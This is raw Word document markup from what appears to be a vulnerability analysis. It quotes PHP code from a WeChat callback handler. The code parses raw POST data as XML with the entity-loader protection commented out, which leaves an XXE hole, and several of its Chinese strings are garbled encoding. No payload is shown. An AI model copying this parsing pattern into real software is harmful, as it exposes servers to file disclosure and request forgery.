            <v:rect id="_x0000_s1317" style="position:absolute;left:2197;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1316" style="position:absolute;left:2297;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1315" style="position:absolute;left:2397;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1314" style="position:absolute;left:2497;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1313" style="position:absolute;left:2597;top:2203;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1312" style="position:absolute" from="1614,2140" to="1614,2466" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1311" style="position:absolute" from="8364,2140" to="8364,2466" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1310" style="position:absolute;left:1617;top:2466;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1309" style="position:absolute;left:1797;top:2529;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1308" style="position:absolute;left:2713;top:2529;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1307" style="position:absolute;left:3629;top:2529;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1306" style="position:absolute" from="1614,2466" to="1614,2792" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1305" style="position:absolute" from="8364,2466" to="8364,2792" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1304" style="position:absolute;left:1617;top:2792;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1303" style="position:absolute;left:1797;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1302" style="position:absolute;left:1897;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1301" style="position:absolute;left:1997;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1300" style="position:absolute;left:2097;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1299" style="position:absolute;left:2197;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1298" style="position:absolute;left:2297;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1297" style="position:absolute;left:2397;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1296" style="position:absolute;left:2497;top:2855;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1295" style="position:absolute;left:2597;top:2855;width:116;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1294" style="position:absolute;left:2713;top:2855;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1293" style="position:absolute" from="1614,2792" to="1614,3118" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1292" style="position:absolute" from="8364,2792" to="8364,3118" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1291" style="position:absolute;left:1617;top:3118;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1290" style="position:absolute;left:1797;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1289" style="position:absolute;left:1897;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1288" style="position:absolute;left:1997;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1287" style="position:absolute;left:2097;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1286" style="position:absolute;left:2197;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1285" style="position:absolute;left:2297;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1284" style="position:absolute;left:2397;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1283" style="position:absolute;left:2497;top:3181;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1282" style="position:absolute;left:2597;top:3181;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1281" style="position:absolute" from="1614,3118" to="1614,3444" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1280" style="position:absolute" from="8364,3118" to="8364,3444" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1279" style="position:absolute;left:1617;top:3444;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1278" type="#_x0000_t75" style="position:absolute;left:1797;top:3507;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:line id="_x0000_s1277" style="position:absolute" from="1614,3444" to="1614,3770" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1276" style="position:absolute" from="8364,3444" to="8364,3770" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1275" style="position:absolute;left:1617;top:3770;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1274" type="#_x0000_t75" style="position:absolute;left:1797;top:3833;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1273" style="position:absolute;left:2197;top:3833;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1272" style="position:absolute;left:2920;top:3833;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1271" style="position:absolute;left:3040;top:3833;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1270" style="position:absolute;left:4004;top:3833;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1269" style="position:absolute;left:4125;top:3833;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1268" style="position:absolute" from="1614,3770" to="1614,4096" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1267" style="position:absolute" from="8364,3770" to="8364,4096" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1266" style="position:absolute;left:1617;top:4096;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1265" type="#_x0000_t75" style="position:absolute;left:1797;top:4159;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:line id="_x0000_s1264" style="position:absolute" from="1614,4096" to="1614,4422" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1263" style="position:absolute" from="8364,4096" to="8364,4422" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1262" style="position:absolute;left:1617;top:4422;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1261" style="position:absolute;left:1797;top:4485;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1260" style="position:absolute;left:2713;top:4485;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1259" style="position:absolute;left:3629;top:4485;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1258" style="position:absolute;left:3870;top:4485;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1257" style="position:absolute;left:3990;top:4485;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1256" style="position:absolute" from="1614,4422" to="1614,4748" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1255" style="position:absolute" from="8364,4422" to="8364,4748" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1254" style="position:absolute;left:1617;top:4748;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1253" style="position:absolute;left:1797;top:4811;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1252" style="position:absolute;left:2713;top:4811;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1251" style="position:absolute;left:3629;top:4811;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1250" style="position:absolute;left:3870;top:4811;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1249" style="position:absolute;left:3990;top:4811;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1248" style="position:absolute" from="1614,4748" to="1614,5074" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1247" style="position:absolute" from="8364,4748" to="8364,5074" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1246" style="position:absolute;left:1617;top:5074;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1245" style="position:absolute;left:1797;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1244" style="position:absolute;left:1897;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1243" style="position:absolute;left:1997;top:5137;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1242" style="position:absolute;left:2238;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1241" style="position:absolute;left:2338;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1240" style="position:absolute;left:2438;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1239" style="position:absolute;left:2538;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1238" style="position:absolute;left:2638;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1237" style="position:absolute;left:2738;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1236" style="position:absolute;left:2838;top:5137;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1235" style="position:absolute;left:2938;top:5137;width:691;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1234" style="position:absolute;left:3629;top:5137;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1233" style="position:absolute" from="1614,5074" to="1614,5400" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1232" style="position:absolute" from="8364,5074" to="8364,5400" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1231" style="position:absolute;left:1617;top:5400;width:6745;height:494" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1230" style="position:absolute;left:1797;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1229" style="position:absolute;left:1897;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1228" style="position:absolute;left:1997;top:5463;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1227" style="position:absolute;left:2238;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1226" style="position:absolute;left:2338;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1225" style="position:absolute;left:2438;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1224" style="position:absolute;left:2538;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1223" style="position:absolute;left:2638;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1222" style="position:absolute;left:2738;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1221" style="position:absolute;left:2838;top:5463;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1220" style="position:absolute;left:2938;top:5463;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1219" style="position:absolute" from="1612,5896" to="8366,5896" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1218" style="position:absolute" from="1614,5400" to="1614,5898" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1217" style="position:absolute" from="8364,5400" to="8364,5898" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1216" type="#_x0000_t202" style="position:absolute;left:1798;top:573;width:5563;height:4438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ind w:right="-1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class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wechatCallbackapiTest extends mysql</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126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914" w:right="-1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valid()</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="398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4" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="799" w:right="13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$echoStr = $_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GE</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>T[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"echostr"]; if($this-&gt;checkSignature())</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1831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914" w:right="-1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$echoStr);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="79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398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398" w:right="-11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public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function responseMsg()</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="398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{</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="1831" w:right="-1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color w:val="333333"/>
                        <w:spacing w:val="-13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if(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!$this-&gt;checkSignature())</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                      <w:ind w:left="1831" w:right="-1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 {</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1215" type="#_x0000_t202" style="position:absolute;left:1997;top:5138;width:2475;height:526" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="1631"/>
                      </w:tabs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  <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/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exit(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 w:line="200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//</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1214" type="#_x0000_t202" style="position:absolute;left:2938;top:5465;width:120;height:199" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>code.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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1212" type="#_x0000_t202" style="width:337.5pt;height:556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50" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$postStr = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>addslashes(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$GLOBALS["HTTP_RAW_POST_DATA"]);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if</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (!empty($postStr))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 w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">// </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>libxml_disable_entity_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>loader(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>true);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288" w:firstLine="1200"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postObj = simplexml_load_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>string(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postStr, 'SimpleXMLElement', LIBXML_NOCDATA);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380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fromUsername = $postObj-&gt;FromUserName;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>$toUsername = $postObj-&gt;ToUserName;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 xml:space="preserve">$keyword = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postObj-&gt;Content);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1076" w:right="761"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$keyword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utf8_to_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>gbk(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$keyword);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1076" w:right="761"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$keyword =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addslashes(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$keyword);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$time = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>time(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2928" w:right="175"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$event</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-52"/>
                    </w:rPr>
                    <w:t xml:space="preserve"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57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trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postObj-&gt;Event); if ($event === "subscribe")</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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 w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$word= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>»ØžŽj·µ»ØœôŒ±ÕÐÆž£¬»ØžŽn·µ»Ø×îÐÂÕÐÆž£¡Äú¿ÉÒÔ³¢ÊÔÊäÈ ëÖ°Î»Ãû³ÆÈç¡°»áŒÆ¡±£¬ÏµÍ³œ«»á·µ»ØÄúÒªÕÒµÄÐÅÏ¢£¬ÎÒÃÇÅ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¬ÁŠŽòÔì×îÈËÐÔ»¯µÄ·þÎñÆœÌš£¬Ð»Ð»¹Ø×¢¡£";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$this-&gt;exit_word_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>message(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$word,$fromUsername,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$toUsername</w:t>
                  </w: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time);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:right="765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$default_pic=ROOT."/data/images/"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.DEFAULT_PIC</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>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714" w:right="210"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$first_pic=ROOT."/data/images/".FIRST_PIC;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="2928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$event === "CLICK"){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1211" type="#_x0000_t202" style="width:337.5pt;height:572.4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6"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="2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$_CFG['weixin_apiopen']=='0')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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$word="ÍøÕŸÎ¢ÐÅœÓ¿ÚÒÑŸ¹Ø±Õ";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$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit_word_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>message(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$word,$fromUsername,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$toUsername</w:t>
                  </w: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time);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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$postObj-&gt;EventKey=="binding"){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="898"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$usinfo =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 w:hanging="915"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;get_user_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>info(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fromUsername);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!empty($usinfo)){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$word="ÄúÒÑŸ°ó¶š¹ýÁË!</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="1260"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>}else</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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$word="ÇëÊäÈëÄúµÄÕËºÅÃÜÂë.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ÀýÈç</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:ÕÅÈý</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/123456";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="1863"/>
                    <w:jc w:val="right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4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095" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;exit_word_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>message(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$word,$fromUsername,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$toUsername</w:t>
                  </w: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time);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...</w:t>
